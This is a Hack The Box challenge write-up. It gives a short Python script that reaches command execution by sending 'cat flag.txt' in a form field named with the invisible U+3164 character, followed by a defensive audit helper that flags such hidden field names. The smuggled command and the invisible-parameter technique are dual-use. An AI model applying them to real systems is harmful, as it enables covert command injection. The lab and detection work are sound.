HackTheBox Hidden Path Challenge
Explore the basics of cybersecurity in the Hidden Path Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/718
Description
Legends speak of the infamous Kamara-Heto, a black-hat hacker of old who rose to fame as they brought entire countries to their knees. Opinions are divided over whether the fabled figure truly existed, but the success of the team surely lies in the hope that they did, for the location of the lost vault is only known to be held on what remains of the NSA’s data centres. You have extracted the source code of a system check-up endpoint - can you find a way in? And was Kamara-Heto ever there?
Exploitation
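#!/usr/bin/env python3
from requests import post
import sys

# The target is passed on the command line as <ip:port>.
if len(sys.argv) < 2:
    print(f"Usage: python {sys.argv[0]} <ip:port>")
    sys.exit(1)

URL = f'http://{sys.argv[1]}/server_status'
params = {
    'choice': 6,
    # The field name is the single character U+3164 (HANGUL FILLER), which renders as blank.
    '\u3164': 'cat flag.txt'
}
r = post(URL, data=params)
print(r.text)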
Summary
The Hidden Path Challenge on Hack The Box is an easy-level challenge that introduces participants to web exploitation and input manipulation. The challenge is centered around extracting the flag from a system by interacting with a vulnerable endpoint. By manipulating the parameters in a request, participants can bypass restrictions and access the flag. This challenge offers an introduction to basic web security concepts and request handling.
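A defender-side check for the request shown under Exploitation, as an added example that is not part of the original write-up or the challenge's code: it audits a form-encoded body for field names that contain blank-rendering or format characters such as U+3164. The helper names, the allowlist containing only `choice`, and the sample bodies are assumptions constructed for illustration.

```python
import unicodedata
from urllib.parse import parse_qsl

# Letters (category Lo) that render as blank space, so a field or variable
# named with one is invisible to a reader. U+3164 is the one used above.
BLANK_LETTERS = {0x115F, 0x1160, 0x3164, 0xFFA0}


def find_invisible(text):
    """Return (index, 'U+XXXX', unicode_name) for each blank-rendering
    letter or format/control character (categories Cf, Cc) in text."""
    hits = []
    for i, ch in enumerate(text):
        if ord(ch) in BLANK_LETTERS or unicodedata.category(ch) in ("Cf", "Cc"):
            name = unicodedata.name(ch, "<unnamed>")
            hits.append((i, f"U+{ord(ch):04X}", name))
    return hits


def audit_form_body(body, expected=frozenset({"choice"})):
    """Audit an application/x-www-form-urlencoded body.

    Returns a list of findings: field names carrying invisible characters,
    and field names outside the expected set (an assumed allowlist)."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        hidden = find_invisible(name)
        if hidden:
            findings.append(("invisible-name", [h[1] for h in hidden], value))
        elif name not in expected:
            findings.append(("unexpected-name", name, value))
    return findings


# Constructed sample bodies; the second mirrors the request shown above.
SAMPLES = [
    "choice=2",
    "choice=6&%E3%85%A4=cat+flag.txt",
    "choice=1&debug=true",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(body, "->", audit_form_body(body) or "ok")
```

`find_invisible` works on any string, so the same helper can be run over source files during code review to surface identifiers that a reader cannot see.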